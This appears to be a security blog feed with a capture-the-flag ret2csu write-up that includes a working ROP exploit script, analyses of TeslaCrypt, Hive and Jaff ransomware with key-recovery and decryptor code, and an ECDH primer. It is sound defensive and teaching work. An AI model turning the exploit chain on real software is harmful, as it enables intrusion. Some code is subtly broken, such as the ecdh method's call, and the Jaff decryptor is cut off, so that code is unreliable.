This challenge requires us to call a function with three arguments like callme
, but this time there is no longer a convenient way to get data into rdx
. We will need to use a more convoluted method known as ret2csu
.
As the name suggests, we’re going to be using two gadgets in the __libc_csu_init()
function. The advantage to this strategy is that __libc_csu_init()
function is present in any C binary compiled for Linux on x86_64, so we can use it in many different attacks.
There are two main gadgets in __libc_csu_init()
that we will be using for this chain. The first pops values into rbx
, rbp
, r12
, r13
, r14
, and r15
:
And the second moves values to rdx
, rsi
, and edi
from r13
, r14
, and r15
:
We can chain these two gadgets together in order to write arbitrary values to rdx
and rsi
. The second gadget ends in a call
, but we can choose the address that is called because the first gadget lets us write arbitrary values to rbx
and r12
. In order to resume our chain after the call, we want to call a gadget of the form pop; ret
.
However, the call address is passed via a pointer in [r12+rbx*8]
, so if we want to call anything, we need a pointer to it first. I looked at several different existing pointers to executable code, but nothing looked suitable for what I needed. Instead, I found a way to write a pointer to a pop rbp; ret
gadget to the .data
section. There were no mov
instructions that I could use for this, so I instead used the gadget add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
to write to an area in memory that I knew would contain all zeroes. (This is definitely not the only possible approach for this part of the challenge, so I also recommend looking at other writeups to see how they handled it.)
Once the call
instruction is handled correctly, the two gadgets in __libc_csu_init()
can be chained together to perform writes to rdx
and rsi
. These gadgets also allow a write to edi
, but ret2win
requires a 64-bit argument, so we need to write to rdi
separately. Fortunately, the binary contains a pop rdi; ret
gadget, so this is easy. With all three arguments written, we can then call ret2win
from its .plt
entry.
Final script:
from pwn import *
arg1 = 0xdeadbeefdeadbeef
arg2 = 0xcafebabecafebabe
arg3 = 0xd00df00dd00df00d
pop_rdi = 0x4006a3 # pop rdi ; ret
pop_rsi = 0x4006a1 # pop rsi ; pop r15 ; ret
mov_rdx_and_call = 0x400680
pop_ret_ptr = 0x601028
pop_rbx_rbp_r12 = 0x40069a
add_rbp = 0x4005e8 # add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
pop_rbp = 0x400588 # pop rbp ; ret
ret2win = 0x400510
ret = 0x4006a4
send_str = b'a'*40 + p64(ret)
send_str += p64(pop_rbx_rbp_r12) + p64(pop_rbp) + b'a'*40
send_str += p64(pop_rbp) + p64(pop_ret_ptr + 0x3d)
send_str += p64(add_rbp)
send_str += p64(pop_rbx_rbp_r12) + p64(pop_ret_ptr // 8) + b'a'*8 + p64(pop_ret_ptr % 8) + p64(arg1) + p64(arg2) + p64(arg3)
send_str += p64(mov_rdx_and_call)
send_str += p64(pop_rdi) + p64(arg1)
send_str += p64(ret2win)
chal = process('./ret2csu')
f = open('fake_stdin','wb')
f.write(send_str)
f.close()
print(chal.recvuntil(b'>'))
chal.sendline(send_str)
print(chal.recvall())
TeslaCrypt was a ransomware strain from 2015. It targeted home users and demanded a ransom of about $500. I looked at the second version of this ransomware, which had a vulnerability in the implementation of its cryptography.
The sample I looked at contained strings relating to the program DVD-Cloner, indicating that this malware spread by impersonating legitimate binaries.
We can also see that the program contains a section with very high entropy, indicating that the ransomware payload is encrypted. The easiest way to dump the decrypted program is to set a breakpoint at VirtualProtect
and look at the address that is marked as executable.
The first time the program is run, it moves itself to %APPDATA%
and saves itself under a random name. After this, the program exits, but it creates a new process with another copy of itself. Attaching the debugger to this process, we find that this copy of the ransomware is actually responsible for performing the encryption.
Once the files are encrypted, the extension .zzz
is appended, and ransom notes called help_restore_files_[random extension].txt
and help_restore_files_[random extension].html
are dropped in each directory. The ransom note claims that it is CryptoWall 3.0 and that RSA-2048 was used in the encryption, none of which is true.
The program uses the open-source cryptography libraries from OpenSSL to perform the encryption. Specifically, it uses the bn
library to handle arbitrarily large numbers and the ec
library to perform encryption based on elliptic curves. In fact, the program contains strings that reveal many of the specific .c files that are in use, making it relatively straightforward to match functions in the decompiled code to functions in the OpenSSL libraries.
TeslaCrypt uses 256-bit AES encryption in CBC mode. A random key is generated for each victim, and a random initialization vector is generated for each encrypted file. The initialization vector is saved to a header at the beginning of the encrypted file, and the AES key is encrypted using a scheme based on the Elliptic Curve Diffie-Hellman key exchange algorithm.
To encrypt the random AES key, the program uses a variation of the Elliptic Curve Diffie-Hellman algorithm. This was my first serious look at elliptic curve cryptography, so I’ve made a separate blog post with a brief overview of how ECDH works. If you’re unfamiliar with ECDH, you can find the writeup here.
The program randomly generates two public/private ECDH keypairs. The first of these keys is used as a master key that can be used to decrypt any file on the victim’s system; the second encrypts the AES key and might vary across different files. For the remainder of this writeup, I’ll be referring to these keys as the “Round 1 key” and the “Round 2 key.”
The program performs two ECDH key exchanges. The first key exchange uses a hard-coded public key and the Round 1 private key. The second key exchange uses the Round 1 public key and the Round 2 private key (which is also the AES key).
The hard-coded public key is the point
x = 0x8f28211163feb956ef1d50d9dc7917e3ae6dac2812cb534f7490a1bee72e0d21
y = 0xff10f31537a476feef8080cfb27a7ce5833b3b16765390a5e756f30b276f6c4a
After the AES encryption, the program writes the following values to the file header:
The program sends out an AES-encrypted HTTP request to the C2 server containing the Round 1 private key. The hex string in this request is encrypted using the hard-coded key
C4 DC B2 0E 93 65 6A 2D 90 BF 85 1F DD B1 16 2B D4 F8 E9 F6 E7 F5 A8 2A 31 1D 40 68 92 6B D5 72
and initialization vector
DE AD BE EF 00 00 BE EF DE AD 00 00 BE EF DE AD
Once we decrypt the HTTP request, there are a few interesting fields. key
is the private key, and addr
is a Bitcoin wallet address. ip
is the victim’s IP address retrieved from ipinfo.io
, though it is malformed in the screenshot above because I did not recreate the ipinfo.io
site on my simulated network. gate
is always G1
, and I’m unsure what it refers to. Finally, inst_id
is the victim ID given in the ransom note.
If this request were to be intercepted, it would be possible to use the hard-coded AES key to decrypt the request and retrieve the key. However, TeslaCrypt’s primary targets were home users, who are unlikely to be logging any requests.
In order to ensure that the same Round 1 keypair is always used, the program creates a registry key under HKCU\Software\[victim ID number]
. The key contains the value of the Round 1 public key, the first product, a Bitcoin wallet address, and the time of encryption. If this registry key is present, the program reads these values and reuses them rather than generate a new Round 1 keypair. However, even if the registry key is present, the program will still generate a new AES key if it is stopped and run again.
Based on the HTTP request, we know that the creator of the ransomware has the Round 1 private key. They could then perform ECDH key exchange between the Round 1 private key and the Round 2 public key. Dividing the second product by the result of this key exchange, they can rederive the AES key and decrypt the files.
The following script reimplements this algorithm:
def retrieve_values(priv, pub1, pub2, prod1, prod2):
hc_x = 0x8f28211163feb956ef1d50d9dc7917e3ae6dac2812cb534f7490a1bee72e0d21
hc_y = 0xff10f31537a476feef8080cfb27a7ce5833b3b16765390a5e756f30b276f6c4a
hc = Point(hc_x, hc_y)
test_pub = secp256k1.double_and_add(secp256k1.G, priv)
if(test_pub != pub1):
print("failure on first public key:", test_pub)
return
ecdh1 = secp256k1.ecdh(hc, priv)
print("ecdh 1 result:", hex(ecdh1))
if(prod1 % ecdh1 == 0):
next = prod1 // ecdh1
else:
print("failure on first ecdh:", hex(ecdh1))
return
ecdh2 = secp256k1.ecdh(pub2, priv)
print("ecdh 2 result:", hex(ecdh2))
if(prod2 % ecdh2 == 0):
aes = prod2 // ecdh2
print("successfully recovered aes key:", hex(aes))
return
else:
print("failure on second ecdh:", hex(ecdh2))
return
The flaw in the encryption comes from the product of the private key with the ECDH key exchange result. The product is a 512-bit number, and neither the private key nor the ECDH result will be prime most of the time. This means that it’s possible to factor it and retrieve the private key.
I initially dismissed this method, as I thought that most keys would end up having large factors that would be difficult to find in a reasonable amount of time. However, I later found out that this is exactly how TeslaCrypt was originally broken. Knowing this, I revisited the idea and was eventually able to use YAFU to factor a key.
For a test run, I factored the value
5AA8DFED3741DA01C0202D1359C3909BEE1570C5DA36505F1E76E362B2D65818CCD0E40E53FAF6F4FC1676B886E17759B454E0FA9D8EBD9EE8F8683DC0831DC7
which has a corresponding public key of
00 04 2F 9A 65 0A E2 F3 15 A4 40 45 59 19 48 70 F7 DC 9C AD AC 47 24 B0 2D B1 FD F5 F5 70 20 F5 74 11 20 E5 E9 88 F2 E8 67 A8 E3 00 78 4E E8 44 48 C4 2E E0 47 A3 48 B7 C2 BB 2E 90 59 2F D3 2C F9 3C
After a little over an hour, YAFU outputs the following factors:
***factors found***
P1 = 3
P1 = 3
P1 = 5
P1 = 7
P3 = 101
P3 = 773
P5 = 10837
P8 = 99807317
P25 = 1655126720228753303122051
P68 = 13781398374395757363311877843637355500151837520775480225177546547567
P43 = 7825723884698533506375783563522817813881993
ans = 1
From there, we need to figure out which of the divisors of this product is the correct private key. However, this is easy to do. The public key is given to us in the encrypted file header, so we can just generate the public key that goes with each private key candidate and see if it matches the given one:
def get_key_candidates(factors, pubkey):
for i in range(len(factors)):
for subset in combinations(factors, i):
prod = 1
for fac in subset: prod *= fac
if(secp256k1.double_and_add(secp256k1.G, prod) == pubkey):
print(prod)
print(subset)
In this case, we recover the private key
86655516964165928432754623993726968327056923720817543761676186481982334307557 = 3 * 3 * 7 * 99807317 * 13781398374395757363311877843637355500151837520775480225177546547567
which we can then use to recover all encrypted AES keys and decrypt our files.
]]>This writeup gives a brief overview of the ECDH algorithm, along with a simple Python implementation. I originally intended this to be part of my TeslaCrypt writeup, but it got long enough that I decided to make a separate post.
Much of what I explain here is described in more detail in the Wikipedia pages for elliptic curve cryptography and elliptic curve point multiplication, so I highly recommend reading through them if you’re interested in a more in-depth explanation.
An elliptic curve is a curve of the form y**2 = x**3 + ax + b
. For the purposes of elliptic curve cryptography, we will be considering an elliptic curve defined over a finite field.
We can define a group operation over a given elliptic curve in the following way: Consider two points, P and Q, on an elliptic curve. The line connecting those points intersects exactly one other point, R. We consider R to be the sum of P and Q.
In the case where P and Q are the same point, we obviously can’t draw a line connecting the points, so we instead take the tangent line to the curve at P. The point P + P is the point where the tangent line intersects the curve.
The identity element is defined as the “point at infinity”, which is not a point on the curve. If the line connecting two points on an elliptic curve is vertical, it does not intersect a third point on the curve, but we say that it intersects the point at infinity. Every point P has an inverse -P, which when added to P gives the point at infinity as a result.
Now that we have defined an addition operation over elliptic curves, we can also define scalar multiplication. To multiply a point P by a number k, we simply add P to itself k times.
Suppose we take an initial generator point G, then add it to itself k times to obtain a point kG. This scalar multiplication is easy to compute: if we know G and k, we can compute kG in O(log k) time using a variation of the repeated-squaring algorithm called “double and add”, which I’ll discuss later.
However, now suppose we don’t know k, but we only know G and kG. It turns out that there is no known polynomial-time algorithm to compute k using this information, making this a good basis for a cryptographic algorithm.
ECDH is a key exchange protocol that takes advantage of the difficulty of the elliptic curve discrete logarithm problem. For ECDH, we define a public/private keypair in the following way:
y**2 = x**3 + ax + b
, along with a prime modulus p. Additionally, choose a standard base point G. The parameters a, b, p, and G are public values that must be agreed upon in advance by both parties involved in the key exchange protocol.Note that a, b, p, and G are neither part of the private key nor the public key: they are standard values used by everyone implementing the algorithm. Some curves are more secure than others, so it is a good idea to use a standard curve that has been verified to be cryptographically secure. For example, TeslaCrypt used the secure curve secp256k1
, the same curve used in Bitcoin. Its parameters are
a = 0
b = 7
p = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f
G = (0x79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798,
0x483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8)
Suppose Alice and Bob each generate keypairs (A, AG) and (B, BG) respectively. The ECDH key exchange protocol allows them to use their keypairs to agree on a shared secret using the following steps:
Even if an attacker knew AG and BG, they would not be able to determine ABG. Since they do not know A or B, they would not be able to calculate ABG without solving the elliptic curve discrete logarithm problem.
A Python implementation of elliptic curve addition and scalar multiplication is given below.
The naive way to perform scalar multiplication would simply be to perform repeated addition, but a much faster algorithm is possible using a similar algorithm to the repeated-squaring method for modular exponentiation. This is known as the double-and-add method, and it is performed using the following steps:
Suppose we want to add a point P to itself n times. We first define three registers:
acc
, to be used as an accumulator. Initialize this to the identity point.curr
, to store the current exponent. Initialize this to P.n
, to store the binary representation of n.
For each bit of n, starting with the LSB and ending with the MSB,curr
to acc
.curr
to itself.
On step k of this process curr
contains (2**k)P
, as the point in curr
is doubled at each step. By the end of the process, acc
contains the point nP, which is what we are looking for.class Point:
def __init__(self, x, y, is_infty=False):
if(is_infty):
self.is_infty = True
x = None
y = None
else:
self.is_infty = False
self.x = x
self.y = y
def __repr__(self):
return "x: " + hex(self.x) + "\n" + "y: " + hex(self.y)
def __eq__(self, other):
return (self.x == other.x and self.y == other.y)
def __ne__(self, other):
return not self.__eq__(other)
class Curve:
def __init__(self, a, b, G, p):
self.a = a
self.b = b
self.G = G
self.p = p
def add(self, point1, point2):
# handle special case for point at infinity
if(point2.is_infty): return point1
if(point1.is_infty): return point2
if(point1 == point2):
# calculate (3x_1**2 + a)/(2y_1) mod p
l = (3 * pow(point1.x, 2, self.p) + self.a) * pow((2 * point1.y % self.p), -1, self.p)
else:
# calculate (y_2 - y_1)/ (x_2 - x_1) mod p
l = ((point2.y - point1.y) % self.p) * pow(((point2.x - point1.x) % self.p), -1, self.p)
x_res = (pow(l, 2, self.p) - point1.x - point2.x) % self.p
y_res = (l * (point1.x - x_res) - point1.y) % self.p
return Point(x_res, y_res)
def double_and_add(self, point, n):
acc = Point(None, None, True) #start at point at infinity
curr = point
while(n != 0):
if(n & 1 == 1): acc = self.add(acc, curr)
curr = self.add(curr, curr)
n = n >> 1
return acc
def ecdh(self, pub, priv):
return self.double_and_add(self, pub, priv).x
Hive is a ransomware program that first appeared in 2021. Unlike most ransomware, it uses a custom encryption algorithm, which makes it especially challenging to reverse. I’ll be analyzing the first version of Hive, which is written in Golang, though it has since been rewritten in Rust.
This sample was obtained from vx-underground, and its hash is 2f7d37c22e6199d1496f307c676223dda999c136ece4f2748975169b4a48afe5
.
Though the sample included symbols for all functions, Binary Ninja is not capable of analyzing Golang symbols by default. However, Mandiant has released a tool called GoReSym that reads symbols from Golang binaries. This tool produces a JSON file containing the names of both standard library and user-defined functions along with the virtual addresses where they appear.
With the symbols recovered, we can then import them into Binary Ninja with the following script.
import json
import binaryninja
from binaryninja.types import Symbol
from binaryninja.enums import SymbolType
def rename_syms(view):
f = open('/home/remnux/.binaryninja/plugins/gosymtab/syms')
table = json.load(f)
for i in table["UserFunctions"]:
start = i["Start"]
name = i["FullName"]
s = Symbol(SymbolType.FunctionSymbol, int(start), name)
view.define_user_symbol(s)
for i in table["StdFunctions"]:
start = i["Start"]
name = i["FullName"]
s = Symbol(SymbolType.FunctionSymbol, int(start), name)
view.define_user_symbol(s)
for i in table["Types"]:
va = i["VA"]
name = i["Str"]
s = Symbol(SymbolType.DataSymbol, int(va), name)
view.define_user_symbol(s)
binaryninja.plugin.PluginCommand.register("GoReSym integration", "rename functions according to output of GoReSym tool", rename_syms)
With the symbols recovered, the program flow immediately becomes a lot more clear, as the sample uses descriptive names like EncryptFiles
and RemoveItself
.
The encryption algorithm used in this sample relies on a single “primary key”, which is generated by reading 0xa00000 random bytes from the crypto/rand.Read
function. As far as I know, Golang’s crypto/rand
functions are cryptographically secure, so we have no way to predict what will be generated in this step.
Once the primary key is generated, it is encrypted and exported to a file with extension .key.hive
. The name of the file is the base64 representation of the MD5 hash of the key.
The primary key is divided into blocks, with each block being encrypted by one of several RSA public keys in PKCS1 format. The keys are of varying size, and all of them use the public exponent 65537. The program uses the OAEP encryption scheme with a hash length of 256 for all keys.
There is a table of 100 of these RSA keys hard-coded into the file, and each one is used in order. Once all keys have been used, the program starts over from the beginning of the table.
The RSA-encrypted primary key appears to be the only content of the .key.hive
file.
Files are encrypted in blocks of length 0x1000, but a variable length of data is skipped over during encryption.
The length of these skipped segments is chosen differently depending on the size of the file to be encrypted.
The following script can be used to determine how many bytes are skipped:
def get_skip_length(file_length):
if(file_length <= 0x2000): return 0
if(file_length >= 0x20000):
if(file_length >= 0x40000000): m = 1
elif(file_length >= 0x6400000): m = 5
elif(file_length >= 0xa00000): m = 10
elif(file_length >= 0x100000): m = 20
else: m = 30
div_val = m * (file_length >> 0xc) // 100
else: div_val = file_length >> 0xc
return (file_length - (div_val << 0xc)) // (div_val - 1)
In some cases, the number of bytes skipped can be very large, especially for larger file sizes. It might be possible to take advantage of this to recover some data.
The encryption algorithm begins by randomly selecting two indices from the primary key. The program reads a stream of bytes from the primary key starting from these random indices, and each byte of the plaintext is XORed with the corresponding byte from both streams.
The two random indices can be determined based on the name of the encrypted file. The extension of the encrypted files is a base64 representation of a 32-byte number. The first 16 bytes are the MD5 hash of the primary key, indicating which key should be used for decryption. The second 16 bytes contain both indices concatenated together, represented as 64-bit little-endian integers.
The indices are generated as 64-bit integers, but in order to ensure that they are less than the size of the primary key, the first index is taken modulo 0x900000 and the second index is taken modulo 0x9ffc00.
During encryption, the first key never resets, even when bytes are skipped over during encryption. The second key resets every 0x400 bytes.
My attempt to replicate the encryption algorithm is shown below. This algorithm also functions as a decryption algorithm if the primary key is known, so I tested it by dumping the primary key from memory and using the script to decrypt an encrypted file.
def decrypt_with_primary(primary_name, filename):
primary = open(primary_name, 'rb').read()
ciphertext = open(filename, 'rb').read()
# retrieve indices from base64-encoded strings in filename
base64_str = filename.split('.')[1]
short_key_bytes = base64.b64decode(base64_str + '==')[16:]
key1 = short_key_bytes[0:8]
key2 = short_key_bytes[8:16]
# xor keys are offsets in the primary key
idx1 = int.from_bytes(key1, 'little') % 0x900000
idx2 = int.from_bytes(key2, 'little') % 0x9ffc00
plaintext = b''
# in larger files, leave some data unencrypted
if(len(ciphertext) >= 0x2000):
skip_len = (len(ciphertext) % 0x1000) // (len(ciphertext) // 0x1000 - 1)
else: skip_len = 0
block_len = 0x1000 + skip_len
for j in range(len(ciphertext) // block_len + 1):
pos = block_len*j
for i in range(pos, max(pos+0x1000, len(ciphertext))):
plain = xor(xor(ciphertext[i], primary[idx1 + i]), primary[idx2 + i%0x400])
plaintext += plain
plaintext += ciphertext[pos+0x1000:pos+block_len]
return plaintext
Unfortunately, I haven’t yet been able to write a decryptor for this sample. There doesn’t seem to be any trace of the primary key left on the system after encryption is complete - the .key.hive
file is RSA encrypted, and the encrypted files contain no relevant information about the primary key.
My first thought was to use some kind of known-plaintext attack, but that’s unlikely to work very well, as each file is encrypted using two different offsets of the primary key. XORing the known plaintext with the encrypted data would give us the XOR of two indices of the primary key, but it’s highly unlikely that the same two indices were ever used to encrypt more than one file.
Strictly speaking, you wouldn’t necessarily need your known plaintext to use the exact same two indices as the encrypted file. Suppose you know that a byte in the ciphertext was XORed with indices A and B, so you need to know A XOR B. If you have a known plaintext that was XORed with index A and some other index C, then you know A XOR C. If you have another known plaintext that uses indices B and C, then you know B XOR C. This means you could recover the key you need by taking (A XOR C) XOR (B XOR C). In this way, you might be able to recover some data by “chaining together” keys from several known plaintexts.
However, this strategy would likely be impractical in the vast majority of cases. You would need a huge amount of known plaintext in order to have a chance at getting the combination of indices you need. Additionally, you’d likely have to XOR thousands of known plaintexts together each time you needed to recover a key, so this method might only be a marginal improvement over brute force.
]]>Recently, I’ve been trying to learn more about reverse engineering ransomware. Jaff is ransomware from a campaign dating back to 2017, and I was told that it had a vulnerability that would make it possible to write a decryptor. I analyzed a sample to see if I could rediscover the vulnerability myself.
You can find the sample I used on MalShare, and its SHA256 hash is 0746594fc3e49975d3d94bac8e80c0cdaa96d90ede3b271e6f372f55b20bac2f
.
The sample is a 32-bit PE excutable written in C++. The executable did not seem to import any functions related to cryptography, and it contained a very long chunk of encrypted data. This meant that the most important functions of this program were likely being decrypted dynamically.
By setting breakpoints on VirtualAlloc
and VirtualProtect
, I kept track of each time a RWX segment of memory was allocated. After several calls to VirtualAlloc
and VirtualProtect
, the program wrote a PE file to one of these segments, which I dumped from memory. This turned out to be the actual encryptor, and it’s what I’ll be focusing on for the remainder of my analysis.
When run, the sample calls itself Ffv opg me liysj sfssezhz
:
Additionally, a GET request is made to fkksjobnn43[.]org/a5/
. As I don’t have access to this C2 server, I have no way of knowing what was expected from this server or whether the encryption process would have proceeded differently if I’d been able to connect.
The binary I dumped from memory imports cryptography-related functions such as CryptEncrypt
, CryptExportKey
, and CryptGenKey
, as well as file enumeration functions such as FindFirstFileW
and FindNextFileW
. This is how I knew I was looking at the actual encryptor.
Additionally, there were several resources containing data used in the encryption process:
#105
: The string representation of the numbers 35326054031861368139563306184134167018130718569482731666001650817539108744401016633231304437224730790638615766740272106403143256
and 35326054031861368139563306184134167018130718569482731666001650829864568371094444203557601170206844003631101722202233367975968667
.
#106
: The file extensions to encrypt:
.xlsx .acd .pdf .pfx .crt .der .cad .dwg .MPEG .rar .veg .zip .txt .jpg .doc .wbk .mdb .vcf .docx .ics .vsc .mdf .dsr .mdi .msg .xls .ppt .pps .obd .mpd .dot .xlt .pot .obt .htm .html .mix .pub .vsd .png .ico .rtf .odt .3dm .3ds .dxf .max .obj .7z .cbr .deb .gz .rpm .sitx .tar .tar.gz .zipx .aif .iff .m3u .m4a .mid .key .vib .stl .psd .ova .xmod .wda .prn .zpf .swm .xml .xlsm .par .tib .waw .001 .002 003. .004 .005 .006 .007 .008 .009 .010 .contact .dbx .jnt .mapimail .oab .ods .ppsm .pptm .prf .pst .wab .1cd .3g2 .7ZIP .accdb .aoi .asf .asp. aspx .asx .avi .bak .cer .cfg .class .config .css .csv .db .dds .fif .flv .idx .js .kwm .laccdb .idf .lit .mbx .md .mlb .mov .mp3 .mp4 .mpg .pages .php .pwm .rm .safe .sav .save .sql .srt .swf .thm .vob .wav .wma .wmv .xlsb .aac .ai .arw .c .cdr .cls .cpi .cpp .cs .db3 .docm .dotm .dotx .drw .dxb .eps .fla .flac .fxg .java .m .m4v .pcd .pct .pl .potm .potx .ppam .ppsx .ps .pspimage .r3d .rw2 .sldm .sldx .svg .tga .wps .xla .xlam .xlm .xltm .xltx .xlw .act .adp .al .bkp .blend .cdf .cdx .cgm .cr2 .dac .dbf .dcr .ddd .design .dtd .fdb .fff .fpx .h .iif .indd .jpeg .mos .nd .nsd .nsf .nsg .nsh .odc .odp .oil .pas .pat .pef .ptx .qbb .qbm .sas7bdat .say .st4 .st6 .stc .sxc .sxw .tlg .wad .xlk .aiff .bin .bmp .cmt .dat .dit .edb .flvv .gif .groups .hdd .hpp .log .m2ts .m4p .mkv .ndf .nvram .ogg .ost .pab .pdb .pif .qed .qcow .qcow2 .rvt .st7 .stm .vbox .vdi .vhd .vhdx .vmdk .vmsd .vmx .vmxf .3fr .3pr .ab4 .accde .accdt .ach .acr .adb .srw .st5 .st8 .std .sti .stw .stx .sxd .sxg .sxi .sxm .tex .wallet .wb2 .wpd .x11 .x3f .xis .ycbcra .qbw .qbx .qby .raf .rat .raw .rdb rwl .rwz .s3db .sd0 .sda .sdf .sqlite .sqlite3 .sqlitedb .sr .srf .oth .otp .ots .ott .p12 .p7b .p7c .pdd .pem .plus_muhd .plc .pptx .psafe3 .py .qba .qbr.myd .ndd .nef .nk .nop .nrw
#109
: The ransom note in HTML form, with the string [ID5]
in place of the victim’s decryption ID.
#110
: The string .jaff
, which is the extension appended to encrypted files.
#111
: The URL fkksjobnn43[.]org/a5/
.
#112
: The ransom note in text form, again with [ID5]
in place of the ID.
#113
: A string of bytes which, when XORed with the second number in #106
, gives the strings ReadMe.txt
, ReadMe.bmp
, and ReadMe.html
.Additionally, the string cmd /C del /Q /F %s
found in the program suggests that it is intended to delete itself once encryption is complete.
The sample uses 256-bit AES to encrypt files. For debugging purposes, I set a breakpoint on CryptImportKey
to read the key blob from memory:
A new key is generated using CryptGenKey
each time the program is run.
Beginning with the root directory, the program enumerates all files and subdirectories and uses CryptEncrypt
to AES encrypt each file. The program uses GetLogicalDrives
to find all drives connected to the system, and encrypts all drives that are not CD-ROM drives (possibly because a CD-ROM drive would make a noticeable noise as it started up).
The .jaff
extension is appended to the encrypted file, and the AES-encrypted bytes are written. We can see that there are multiple WriteFile
calls to the encrypted file, revealing that something else is appended to the .jaff
file before the encrypted data:
The appended value turned out to be the ASCII representation of a large number.
Additionally, the ransom note is dropped in each encrypted directory. The note is dropped in text, HTML, and image forms, with file names of ReadMe.txt
, ReadMe.html
, and ReadMe.bmp
respectively.
A new victim ID is generated each time the program is run.
I suspected that the long number appended before the encrypted data in the .jaff
files was likely an encryption of the AES key. A new AES key was generated for each victim, so the program would need some way to store it.
I found that the AES key was being passed as an argument to sub_402d70
. When passed into this function, the AES key blob was being stored as a decimal representation in little-endian format, with each decimal digit being stored as a 16-bit integer. Each byte of the key blob was converted to three decimal digits; for instance, 08
would be stored as 008
and 8A
would be stored as 138
. Additionally, the digit “1” was appended to the sequence:
For example, during one run of the program, the original AES key blob was the following:
08 02 00 00 10 66 00 00 20 00 00 00 52 8A A4 D0 46 E3 4F FE E8 C6 A0 F5 91 0C 25 81 03 0E 5C 3C 57 F6 A0 43 08 32 C9 83 2C 01 FC 95
It was stored as the sequence of bytes
04 00 04 00 00 00 01 00 03 00 01 00 01 00 00 00 02 00 00 00 05 00 00 00 08 00 00 00 00 00 07 00 06 00 00 00 00 00 06 00 01 00 06 00 04 00 02 00 07 00 08 00 00 00 00 00 06 00 00 00 02 00 09 00 00 00 04 00 01 00 00 00 03 00 00 00 00 00 09 00 02 00 01 00 07 00 03 00 00 00 02 00 01 00 00 00 05 00 04 00 01 00 05 00 04 00 02 00 00 00 06 00 01 00 08 00 09 00 01 00 02 00 03 00 02 00 04 00 05 00 02 00 09 00 07 00 00 00 07 00 02 00 02 00 00 00 07 00 00 00 08 00 00 00 02 00 04 00 06 00 01 00 08 00 03 00 01 00 02 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 01 00 06 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 08 00 00 00 00 00 01
which corresponds to the number
1008002000000016102000000032000000000082138164208070227079254232198160245145012037129003014092060087246160067008050201131044
To convert this representation back into bytes, I used the following function:
def convert_from_decimal(s):
result = b''
s_fixed = s[1:]
for i in range(0, len(s_fixed) ,3):
curr_num = s_fixed[i:i+3]
result += int(curr_num).to_bytes(1, 'little')
return result
At this point, it was time to look at what sub_402d70
was actually doing. The arguments to the function were the AES key, an array of bytes that were either 1 or 0, and the decimal representation of the number 35326054031861368139563306184134167018130718569482731666001650829864568371094444203557601170206844003631101722202233367975968667
. Note that this is one of the two numbers that appeared in resource #105
.
By experimenting with this subrouting in a debugger, I found that the program was calling functions that performed multiplication and division on arbitrarily large numbers. Sepecifically, the AES key was being squared over and over, and something different was done with the result based on the values in the array of 1s and 0s.
This proved to be the repeated-squaring method for modular exponentiation. The AES key was being raised to an exponent, which was passed as an argument in binary form in order to aid in the repeated-squaring algorithm. The modulus was the long number stored in the resource.
The use of modular exponentiation immediately suggested that RSA was being used. Normally, this would mean we wouldn’t be able to decrypt the AES key, as we need the private key for that.
However, resource #105
contains two numbers, and we’ve only used one so far. One of them is the public modulus n, and the other number is very close to it. It seemed possible that the second number was phi(n), which is needed to compute the private exponent d from the public exponent e. I wrote the following script to test it:
def rsa_decrypt(msg, e, n, phi_n):
d = pow(e, -1, phi_n)
return pow(msg, d, n)
Sure enough, passing in the second number as phi(n) returned the decrypted AES key! Since the RSA key was hard-coded, this meant that we had enough information to write a decryptor for any files encrypted with this sample, even if the AES key changed each time.
To generate the private exponent for the decryptor, I not only needed phi(n), but also the public exponent. However, the program generated a new public exponent each time it was run.
Upon closer inspection, I found that the public exponent was usually close to the victim ID given in the ransom note. Sometimes they matched exactly, but sometimes the exponent was slightly more than the ID, and occasionally they didn’t seem to match at all.
Eventually, I found that the victim ID seemed to be randomly generated. If a negative number was generated, the bits were negated in order to produce a positive result.
After correcting for this, I found that either the victim ID or its negation was always close to the exponent, but there didn’t seem to be much of a pattern to the exact difference.
It turned out that the victim ID sometimes needed to be modified before it could work as a public exponent. In RSA, the public exponent needs to be invertible modulo phi(n), meaning that the exponent and phi(n) need to be relatively prime. However, the process that generated the victim IDs did not guarantee a result that was relatvely prime to phi(n).
(This is just speculation, but my guess is that this is why phi(n) was hard-coded in the executable - they needed to guarantee that they had a valid public exponent, so they had to check whether the ID and phi(n) were relatively prime. However, this also gives us enough information to decrypt the files ourselves!)
By incrementing the victim ID until I got a number that was relatively prime to phi(n), I managed to retrieve the public exponent.
def get_relatively_prime(e, phi_n):
while(math.gcd(e, phi_n) != 1):
e += 2
return e
We now have enough information to write a decryptor that decrypts the victim’s files using only the encrypted .jaff
file and the ID number in the ransom note.
import binascii
import math
from Crypto.Cipher import AES
from struct import pack, unpack
phi_n = 35326054031861368139563306184134167018130718569482731666001650817539108744401016633231304437224730790638615766740272106403143256
n = 35326054031861368139563306184134167018130718569482731666001650829864568371094444203557601170206844003631101722202233367975968667
def convert_from_decimal(s):
result = b''
s_fixed = s[1:]
for i in range(0, len(s_fixed) ,3):
curr_num = s_fixed[i:i+3]
result += int(curr_num).to_bytes(1, 'little')
return result
def rsa_decrypt(msg, e, n, phi_n):
d = pow(e, -1, phi_n)
return pow(msg, d, n)
def get_relatively_prime(e, phi_n):
while(math.gcd(e, phi_n) != 1):
e += 2
return e
def aes_decrypt(ciphertext, blob):
iv = b'\x00'*16
key_bytes = blob[12:]
key = AES.new(key_bytes, AES.MODE_CBC, iv)
padded_text = ciphertext + b'\x00'*(16 - len(ciphertext)%16)
return key.decrypt(padded_text)
def decrypt(filename, id):
#parse the encrypted AES key and data from the file
enc_file = open(filename, 'rb').read()
num_size = unpack('<I', enc_file[0:4])[0]
key_str = enc_file[4:num_size+4]
ciphertext = enc_file[num_size+8:]
keys = [int(i) for i in key_str.split()]
aes_key = []
#test both the victim ID and its negation for a valid public exponent
exp1 = get_relatively_prime(id | 1, phi_n)
for k in keys: aes_key.append(rsa_decrypt(k, exp1, n, phi_n))
if(str(aes_key[0]))[0:6] != '100800':
aes_key = []
